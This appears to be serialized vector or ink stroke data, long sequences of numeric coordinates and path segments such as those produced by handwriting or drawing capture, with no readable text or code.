1-1,12-8 1,-18 10-61,0-1 1,0 0-1,0-1 0,-1 1 1,0-1-1,1 0 0,-1 0 0,0 0 1,-1 0-1,1-1 0,-1 1 0,0-1 1,0 0-1,0 0 0,-1-1 1,1 1-1,-1 0 0,-1-1 0,1 1 1,-1-1-1,0 0 0,0 1 0,-1-1 1,1 0-1,-1 1 0,-1-1 1,1 0-1,-1 0 0,0 1 0,0-1 1,-1 1-1,1-1 0,-5-8 1,4 10 31,0 0 1,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0-1,0 0 1,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0-1,0 0 1,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0-1,-7-1 1,5 1-25,-1 0 0,1 1-1,-1 0 1,1 0 0,-1 0-1,1 1 1,-1 0 0,1 0-1,0 0 1,-1 1 0,1 0-1,-10 5 1,-3 3-26,15-8-54,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,1 0 0,-1 0 1,-3 5-1,-19 15-1837,12-12-1274,0 3-5617,5-8 5656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2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3 180,'0'0'106,"0"-1"-1,0 1 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 0-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0 0,-1 1-1,1-1 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,0 0 0,-1 0-1,1 1 1,-12 4 2663,-1 24 259,24 2 773,0-1-2901,-10-26-830,0 0 0,1 0 0,-1-1 0,1 1 1,0 0-1,0-1 0,1 1 0,3 4 0,8 15 314,-8-15-268,0-1 0,0 0 0,1-1 0,0 0 0,13 10 0,0 0 86,29 17 235,-42-30-394,0 1 0,-1 0 0,0 0-1,0 0 1,0 1 0,6 6-1,-1 0-13,2 0 0,-1-1 0,18 11 0,11 10-14,12 6-160,-36-27-1007,-16-10 668,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,2-1 0,-1-9-2992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28 509 564,'-11'7'4311,"9"1"-4953,-12-12 10709,20 6-6031,-7-4-3957,1 1 1,0 0 0,-1 0 0,1-1-1,0 1 1,0 0 0,0 0 0,0-1-1,0 1 1,1 0 0,-1 0-1,0-1 1,0 1 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1-1 0,0 1-1,-1 0 1,1 0 0,0 0-1,1-1 1,1-5 76,-2 4-152,-1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,0 1 1,0-1-1,1 0 1,-1 0 0,1 1-1,-1-1 1,1 1-1,0-1 1,0 1-1,0 0 1,3-3-1,1-1 21,17-26 87,20-13 185,-36 36-280,1 0 1,0 0 0,1 1 0,0 0 0,0 0-1,17-10 1,60-36-27,65-43 91,-112 72-39,-30 17-22,1 2 0,1-1 0,-1 2 0,1-1 0,17-5 0,5-7-1,-9 7-18,-20 9 1,-1 1-1,0-1 1,1 0-1,-1 1 1,1 0 0,0 0-1,-1 0 1,1 0-1,4 1 1,100-13 47,161 1-149,-163 24 236,-86-10-58,0 1 1,0 0-1,0 2 1,-1 0-1,25 10 1,9 2-136,6-2 87,53 17 59,-95-25-61,14 4 134,39 21 1,-5 20-83,-63-50-73,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 3-1,30 24 24,-28-26-13,0 0-1,1 0 1,0 0-1,0 0 1,0-1-1,6 5 1,12 11 140,-20-17-131,1 1 2,0-1 0,-1 1 0,1 0 1,0 1-1,-1-1 0,0 0 0,0 1 1,0 0-1,0-1 0,0 1 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 7 0,-1-11-22,-1 1-1,1-1 1,-1 0-1,1 1 1,0-1-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,0-1 1,1 1-1,-1 0 0,0-1 1,1 1-1,-1 0 1,0-1-1,0 1 1,0 0-1,1 0 0,-1 1 4,0-2-3,-1 0-1,1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,0 0 1,0 1-1,1-1 0,-1 0 1,0 0-1,0 1 0,1-1 0,-1 0 1,0 0-1,1 0 0,-1 0 1,0 1-1,0-1 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1-1 0,0 0-210,0 1 139,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0-1-1,-1 1 1,1 0-1,0-1 1,-1 1-1,1 0 1,0-1-1,-1 1 1,1 0 0,0-1-1,-1 1 1,1 0-1,0 0 1,-1-1-1,1 1 1,-1 0-1,1 0 1,-1 0-1,1 0 1,0-1-1,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,0 0-1,-22-8-6540,5-1-808,7 8 3549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1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1 283 936,'0'-1'278,"0"0"0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,1-2 139,-1 0 401,-1 2-636,0-1-1,-1 0 0,1 1 1,0-1-1,0 0 1,0 1-1,0-1 0,0 1 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 1 1,1-1-1,34 8 1595,12 7-1255,-33-10-418,1 0 0,0 0 0,0-2 1,1 0-1,27 2 0,6-3 50,-31-1-68,0 0 0,33-4 0,21-3 44,-59 6 4,0 0 0,0-1 0,0-1 0,0 0 0,0-1 0,0-1 0,-1 0 0,1-1 0,13-6 0,-20 6-40,-1 0 1,1-1 0,-1 1-1,0-1 1,-1 0-1,0-1 1,0 1 0,0-1-1,0 0 1,-1 0 0,-1-1-1,1 1 1,-1-1-1,3-11 1,0-5 109,-5 21-193,0 1-1,0 0 1,0-1 0,-1 1-1,1 0 1,-1-1-1,1 1 1,-1-1-1,0 1 1,0-1 0,0 1-1,0-1 1,-1 1-1,1-1 1,-2-3 0,-4-22 32,5 24-47,1 1 0,-1-1 0,1 0 0,-1 0-1,0 0 1,-1 1 0,1-1 0,-1 0 0,1 1-1,-1-1 1,0 1 0,0 0 0,-5-5 0,7 8-24,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 0,0 0 1,-1-1-1,1 1 1,0 0-1,-1 0 1,1 0-1,0-1 1,-1 1-1,1 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1-1-1,0 1 0,-1 0 1,1 0-1,-1 1 1,1-1-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,0 0 1,-1 1-1,1-1 0,-1 1 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4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1875 0 4,'0'0'2246,"9"6"2859,-9-6-5014,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,0-1 0,-1 1-1,1 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 1-1,0-1 1,-1 0 0,1 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 1 1,-1-1-1,1 0 1,0 0 0,0 0-1,0 0 1,-1 1 0,1-1-1,0 0 1,0 0 0,0 0-1,0 1 1,0-1 0,0 0-1,-1 0 1,1 1 0,0-1-1,0 0 1,0 0 0,0 1-1,0-1 1,0 0 0,0 1-3,0 0 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,0 1 1,-1-1-1,1 1 1,0-1-1,-1 1 0,1-1 1,0 0-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 0-1,1 0 1,0 1-1,-1-1 0,1 0 1,-2 1-1,-10 24 1556,10-21-1558,0-1-1,0 1 1,0-1-1,0 0 1,0 0-1,-1 0 1,0 0-1,1 0 1,-1 0-1,-5 3 1,-37 29 320,38-30-243,-1 0 1,1 0-1,0 1 1,-13 13-1,-6 6 69,-93 66 856,92-69-688,-2-2 0,-53 29 0,78-47-367,-18 13 187,18-12-127,-1 0-1,0 1 1,0-2 0,0 1 0,-11 4 0,0-3-51,0 2 1,1 0-1,-25 13 1,-44 30 572,68-39-563,10-6-43,-1 1 1,0-2-1,0 1 1,0-1 0,0 0-1,0 0 1,-1-1-1,-10 3 1,0 2 22,15-5-31,1-1-1,-1 0 1,0 1 0,1-1 0,-1 0-1,0-1 1,0 1 0,1 0 0,-1-1-1,-4 1 1,-58 22-26,45-16 64,12-4-13,0-1 0,0 0 0,0 0 0,-15 1 0,-72 16 531,93-19-503,-32-1 43,26-2-88,0 1 0,0 1 1,-1-1-1,1 2 0,0-1 0,0 1 0,-1 0 1,-12 2-1,-9 0 205,27-3-154,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0-1 1,0 1-1,0 0 0,-3-3 0,3 3-26,-1-1-1,1 0 1,-1 0-1,1 1 1,-1 0-1,0 0 1,0 0-1,0 0 1,-5 0-1,-4-1-20,0-1-1,0-1 1,1 0-1,-14-7 1,25 11-12,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 1,1-1-1,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-2 0 0,0-1 4,-7-5 0,1 0-1,-1 0 0,0 1 1,-1 0-1,1 1 0,-13-4 1,-62-12-117,82 20 86,2 0 31,0-1 1,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1-1,1 0 1,0-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-17-6 75,12 3-86,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1 1 0,0-1 0,1 1 0,-12-1 0,15 1 1,-6-3 7,-11-1-1,19 5-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 1,0 1-1,0 0 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 1 0,1-1 0,-1 1 1,0-1-1,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1-1 0,-23-11 522,23 13-516,-1 0 0,0 0 0,0-1 1,1 1-1,-1 0 0,0 0 0,1-1 1,-1 1-1,1-1 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,1 0 1,-2-1-1,-8-6 208,5-1 146,6 8-359,1 1 1,-1 0 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,-1 0 1,1 0 0,0-1 0,0 1-1,0 0 1,0 0 0,0 0-1,0 0 1,0-1 0,0 1-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 1-1,0-1 1,0 0 0,0 0 0,-1 0-1,1 0 1,0-10 100,-7 5-75,7 5-35,-1-1 1,1 1-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 1,-1-1-1,1 1 1,0 0 0,-1-1-1,1 1 1,-1 0-1,1-1 1,-1 1-1,1 0 1,0 0-1,-1-1 1,1 1-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 1,0 2-345,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,-2 1 0,-37 24-9590,32-21 7775,-4 2-1658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2 378 568,'0'7'11576,"0"-8"-10713,0 1-795,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 1,0 0-1,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 1,-1-1-1,0 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,1-1 641,-9-4-464,6 2-117,0-1 0,0 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,2-6 0,-2-2 9,11-45-25,-1-5 486,-10-23 606,20 67-620,-7-14-92,-13 31-489,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 1,1-1-1,-1 1 1,0-1-1,0 1 1,1-1-1,-1 1 1,0 0-1,0-1 1,1 1-1,-1 0 1,1-1-1,-1 1 1,0 0-1,1-1 1,5-10 393,-6 10-56,-2-28 1034,-4 27-847,15 10-200,0-6-300,-1 0 0,0 0 0,1 0 0,-1-1-1,1-1 1,0 0 0,-1 0 0,1 0-1,-1-1 1,17-3 0,25-1 15,-9 3 33,-1-2 1,56-12-1,-88 14-90,48 0-126,-55 2-31,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,0 1 0,-1-1-1,0 1 1,1-1-1,-1 1 1,1-1 0,-1 1-1,1 0 1,-1 0-1,0-1 1,0 1 0,1 0-1,-1 0 1,0 0-1,0 0 1,0 1 0,0-1-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 0-1,0 4 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1 516,'0'0'992,"-31"35"2399,21-5-2623,-3 3-191,-19 50 1184,28-78-1539,2 0 0,-1 1 1,0-1-1,1 1 0,0 0 1,0 0-1,0 6 0,-9 22 1132,10-28-1066,0 0-1,0 0 1,0 0-1,1 0 1,-1-1 0,2 1-1,0 11 1,0 4 382,0-18-611,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0 0,1-1 0,-1 1 0,0 0-1,1-1 1,-1 1 0,1-1 0,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,1 0 0,-1 0 0,1 0-1,-1-1 1,1 0 0,-1 1 0,1-1 0,0 0 0,0 0-1,0 0 1,0-1 0,0 1 0,0-1 0,3 1 0,7 1 66,0-1 1,0 0-1,0 0 1,0-2-1,1 1 1,15-4 0,-3-1-725,52-3 1,-76 8-404,-24-7-9516,11 2 7709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8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44,'22'-19'6814,"-22"8"-6203,1 11-537,-1 0-1,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 0,0 1 1,0 0-1,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0 0 0,0 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,0 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,0 1-1,0-1 1,0 0-1,-1 0 0,-5 0 498,8 37 2687,0-33-3173,-1 0-1,0 1 0,0-1 1,0 0-1,0 0 0,0 0 1,-1 1-1,0-1 1,0 6-1,-1-7-62,1 0 1,0 1-1,0-1 1,0 0-1,1 1 1,-1-1-1,1 0 1,0 0-1,0 1 0,0-1 1,0 0-1,0 0 1,3 3-1,7 37 203,-11-43-224,1 1 0,-1 0 1,1-1-1,-1 1 0,1 0 0,-1-1 1,0 1-1,1 0 0,-1 0 0,0-1 1,0 1-1,0 0 0,1 0 0,-1-1 1,0 1-1,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,-1 1 0,1-1-1,0-1 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0-1-1,1 1 1,-1-1 0,0 0 0,0 1-1,1-1 1,-1 1 0,0-1 0,0 0-1,1 1 1,-1-1 0,1 0 0,-1 1-1,0-1 1,1 0 0,-1 1 0,1-1-1,-1 0 1,1 2 73,0 0 1,0 0-1,-1 0 0,1 1 0,-1-1 0,1 0 1,-1 0-1,0 0 0,0 1 0,0-1 0,0 0 1,-1 3-1,-3 15-2311,0-14-2338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10 200,'21'-9'14005,"-20"17"-9262,-1-7-4580,1-1-171,-1 0 1,1 0-1,-1 1 0,1-1 1,-1 0-1,1 1 0,-1-1 1,1 0-1,-1 1 1,1-1-1,-1 0 0,1 1 1,-1-1-1,0 1 0,1-1 1,-1 1-1,0-1 0,1 1 1,-1-1-1,0 1 0,0 0 1,0-1-1,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 0,0 1 1,1 14-3621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14 640,'-7'-13'9977,"14"32"-5314,3 18-2543,-10-10-1444,-1-17-517,0 0-1,1-1 1,1 1 0,0 0-1,0-1 1,0 1-1,6 16 1,-5-22-120,-1 1 1,0-1-1,0 1 0,-1-1 1,1 1-1,-1-1 0,0 8 1,0-7-17,-1-1 1,2 0-1,-1 1 1,0-1 0,1 1-1,0-1 1,2 7-1,8 26 75,-9-20-37,-3-16-101,1-1-1,0 1 0,0-1 0,-1 1 1,1-1-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 0,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 1,1-1-1,-1 1 0,0-1 0,0 1 1,1-1-1,-1 0 0,1 1 1,-1-1-1,0 1 0,1-1 0,-1 0 1,1 1-1,-1-1 0,1 0 0,-1 0 1,1 1-1,-1-1 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-11-33-11501,10 17 8094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74 532,'7'-12'7158,"9"-13"-4077,-10 21-2673,-1 0-1,1 0 1,0 1 0,0-1 0,0 1-1,0 1 1,1-1 0,-1 1 0,1 0 0,0 0-1,-1 1 1,1 0 0,7 0 0,-5 1-534,0 1 1,0 1 0,0-1 0,0 1 0,0 1 0,-1-1-1,1 1 1,-1 1 0,0 0 0,0 0 0,0 1 0,0 0 0,9 7-1,-15-3-1386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26 888,'0'0'6156,"41"-18"-387,-35 16-5639,0 1 0,0-1 1,0 1-1,0 1 0,0-1 0,0 1 0,10 0 0,-10 0-79,82 7-470,-34-2-5526,-45 0 2608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0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54 1604,'-7'13'4309,"8"-13"-4225,-1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 1 0,1-1 1,-1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 1,0 0-1,0 0 0,2 0 1386,41 0 2433,-27 0-3706,1-1-1,0-1 0,0 0 0,-1-1 1,1-1-1,28-11 0,0-5-3206,0-4-5194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2 964,'-9'-1'12594,"7"2"-12562,0 3 102,1-1 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0-1 0,0 1 0,1-1 0,-2 0 0,1 0 0,-4 3 0,-19 15 183,-7 11-177,26-25-160,0 0-1,1 0 1,0 0 0,0 1 0,-6 9 0,8-11-171,-1 0 0,1 0-1,-1-1 1,0 1 0,-1-1-1,1 0 1,-1-1 0,1 1-1,-1-1 1,-8 3 0,8-4-698,0 1 0,1-1 0,-1 0 0,0-1 0,0 0 0,-11 1 0,16-2 704,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1-1 0,1 1-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-2 0,0-8-1509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21 1392,'-1'-1'193,"1"0"0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 1,1 1-1,-1-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0 0 1,1-1-1,-1 1 0,1-1 0,-1 1 0,1 0 0,0-1 0,1 0-84,-2 1 119,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 1,1 0-1,-1 1 0,1 0 0,16 18 2139,10 25-1071,5 10-774,-30-51-508,0 0-1,-1 0 1,1 0 0,0 0-1,0-1 1,0 1 0,1 0-1,3 3 1,16 20 63,-21-23-75,1 0 0,1-1-1,-1 1 1,0-1 0,1 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0-1,6 2 1,20 16-324,-27-19 104,0 0 1,0 1-1,0-1 0,-1 0 0,1 0 0,1 0 0,-1 0 1,0-1-1,0 1 0,0-1 0,0 1 0,0-1 0,1 0 1,-1 0-1,4 0 0,22-6-9136,-19 1 6387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1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1724,'1'-1'385,"-1"-1"1,0 1-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,1-1 0,0 1 1,44-15 2062,-4 1-1947,-24 5-463,-13 7-28,0 0 1,0 0-1,0-1 1,-1 0-1,1 0 1,-1 0-1,6-5 1,-9 6 28,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 1,-1 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,-3-3 0,1 1 605,2 3-605,1 0 0,-1 1 1,1-1-1,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,-1 1 0,-3 2 18,-1-1 0,0 1 0,1 0 0,0 1 0,0 0 0,0-1 0,0 1 0,1 1 1,-1-1-1,1 1 0,-4 5 0,-26 25 384,32-33-413,-1 0 0,1 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 1-1,1 0 0,-1-1 1,1 1-1,-1 0 0,1 0 1,0 0-1,1 1 0,-1-1 1,0 0-1,1 0 0,-1 0 0,1 0 1,0 1-1,0-1 0,1 0 1,-1 0-1,1 0 0,-1 0 1,1 1-1,0-1 0,0 0 1,3 5-1,-1-3-34,0-1 0,0 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,1-1 1,-1 0-1,1 1 0,-1-1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-2 0,0 1 0,10 2 0,22 4-155,-24-5-286,1 0 0,-1-1 0,18 1 0,-9-2-1766,-20 0 1551,1-1 0,0 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0-1 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 0 0,4-2-1,5-3-2341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17 88,'-3'-11'7931,"-3"10"-7361,-2-1 1915,7 1-2394,1 1-1,-1 0 0,1 0 0,-1-1 1,0 1-1,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 1 0,0-1 0,1 0 1,-1 0-1,1 1 0,-1-1 1,0 1-1,-14 3 773,12-4-789,1 1 1,0-1-1,0 0 1,0 1 0,0 0-1,0-1 1,0 1-1,1 0 1,-1 0-1,0 0 1,-2 2-1,-25 20 598,14-12-449,0 1-1,1 0 1,1 1 0,0 1 0,0 0 0,1 0 0,1 2-1,-14 24 1,24-38-214,1 0 0,-1 0 0,1 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,1 1 0,-1-1 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,1 0-1,0 1 1,1 1-6,-1 0 1,1-1-1,0 1 0,0-1 0,1 1 0,-1-1 0,1-1 1,4 5-1,-2-5-71,0 1 0,1-1 1,-1 0-1,0 0 0,1-1 1,0 1-1,-1-2 0,1 1 1,0-1-1,-1 0 0,1 0 1,0-1-1,-1 1 0,8-3 1,42-13-3823,-1-5-4437,-34 10 5209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8 332,'-1'-6'14111,"3"4"-13601,6 8-1696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2 300,'0'-1'7594,"0"4"-7014,14 41 1404,-5-22-1328,-4-5-209,0 1-1,-2 0 0,0-1 0,1 27 0,7 48 903,0-26-853,-11 42-204,0-107-311,-2-13-7239,-5 5 4566,5-4-205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16,'0'-4'528,"1"1"1,-1-1-1,1 1 1,-1-1-1,1 1 1,0 0-1,1-1 0,-1 1 1,0 0-1,1 0 1,0 0-1,0 0 0,4-5 1,-1 2-10,0 0 0,1 1 1,-1 0-1,1 0 0,1 1 0,6-4 0,9-4 470,1 1-1,43-13 0,-62 22-856,7-1-41,0-1 0,0 2-1,0-1 1,0 2 0,1-1-1,-1 2 1,0-1 0,1 2-1,-1-1 1,1 2 0,-1-1-1,0 1 1,0 1 0,0 0-1,0 1 1,0 0 0,-1 1-1,0 0 1,19 12 0,-28-15-56,1 0-1,0 0 1,-1 0 0,1 0-1,-1 1 1,0-1 0,0 1 0,0-1-1,0 1 1,0-1 0,0 1 0,-1 0-1,1-1 1,-1 1 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1-1,0 1 1,-1 0 0,0-1-1,-1 5 1,-6 12 296,-7 6-58,3-14-215,1 0 1,-2-1-1,1 0 1,-1-1 0,-1-1-1,0 0 1,-15 7 0,-13 7-98,23-11-73,-18 7-228,2-4-201,22-2-1552,7 5-4617,23-17 2411,-14 1 3463,10 4-1839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22 135 372,'11'-23'10617,"-2"11"-10523,-8 10 988,-5-14 1359,6 14-2072,-1 2-505,-10 18 858,7-16-719,1-2-3,1 0 0,0 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0-1,0 1 1,0-1 0,-1 0 0,1 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,0 0 0,0 1 0,0-1 0,0 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1-1,0-1 1,0 1 0,0-1 0,0 0 0,0 1 0,1 0-1,-3 4 23,-1 0-13,1-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 1,1 1-1,-2 8 0,3-4-33,2 33-10,-1-42 33,-1 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,1-1 0,-1 1 1,0-1-1,0 0 0,1 1 0,-1-1 0,3 1 0,9 11-17,-12-11 17,-1-1-1,1 1 1,0-1-1,1 0 1,-1 0-1,0 0 1,0 1-1,0-1 1,1 0-1,-1 0 1,1-1-1,-1 1 1,0 0-1,4 1 1,15 6 2,-14-5 1,0 0 1,0-1-1,0 0 1,0 0 0,1 0-1,-1-1 1,0 0-1,1 0 1,-1 0 0,1-1-1,12-1 1,-13 1-2,0-1 0,1 0 0,-1-1-1,0 1 1,0-1 0,0 0 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1-1 